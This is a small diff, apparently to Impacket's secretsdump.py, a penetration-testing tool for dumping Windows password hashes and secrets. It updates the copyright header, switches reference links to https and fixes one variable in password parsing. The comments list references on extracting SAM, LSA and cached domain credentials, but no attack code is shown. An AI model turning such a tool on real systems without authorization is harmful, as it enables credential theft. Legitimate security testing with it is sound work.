@@ -1,5 +1,5 @@
 #!/usr/bin/python2
-# Copyright (c) 2003-2016 CORE Security Technologies
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
 #
 # This software is provided under a slightly modified version
 # of the Apache Software License. See the accompanying LICENSE file
@@ -32,16 +32,16 @@
 #             the pieces together, plus some extra magic.
 #
 # https://github.com/gentilkiwi/kekeo/tree/master/dcsync
-# http://moyix.blogspot.com.ar/2008/02/syskey-and-sam.html
-# http://moyix.blogspot.com.ar/2008/02/decrypting-lsa-secrets.html
-# http://moyix.blogspot.com.ar/2008/02/cached-domain-credentials.html
-# http://www.quarkslab.com/en-blog+read+13
+# https://moyix.blogspot.com.ar/2008/02/syskey-and-sam.html
+# https://moyix.blogspot.com.ar/2008/02/decrypting-lsa-secrets.html
+# https://moyix.blogspot.com.ar/2008/02/cached-domain-credentials.html
+# https://web.archive.org/web/20130901115208/www.quarkslab.com/en-blog+read+13
 # https://code.google.com/p/creddump/
-# http://lab.mediaservice.net/code/cachedump.rb
-# http://insecurety.net/?p=768
+# https://lab.mediaservice.net/code/cachedump.rb
+# https://insecurety.net/?p=768
 # http://www.beginningtoseethelight.org/ntsecurity/index.htm
-# http://www.ntdsxtract.com/downloads/ActiveDirectoryOfflineHashDumpAndForensics.pdf
-# http://www.passcape.com/index.php?section=blog&cmd=details&id=15
+# https://www.exploit-db.com/docs/english/18244-active-domain-offline-hash-dump-&-forensic-analysis.pdf
+# https://www.passcape.com/index.php?section=blog&cmd=details&id=15
 #
 import argparse
 import codecs
@@ -338,7 +338,7 @@ if __name__ == '__main__':
     #In case the password contains '@'
     if '@' in remoteName:
         password = password + '@' + remoteName.rpartition('@')[0]
-        address = remoteName.rpartition('@')[2]
+        remoteName = remoteName.rpartition('@')[2]
 
     if options.just_dc_user is not None:
         if options.use_vss is True:
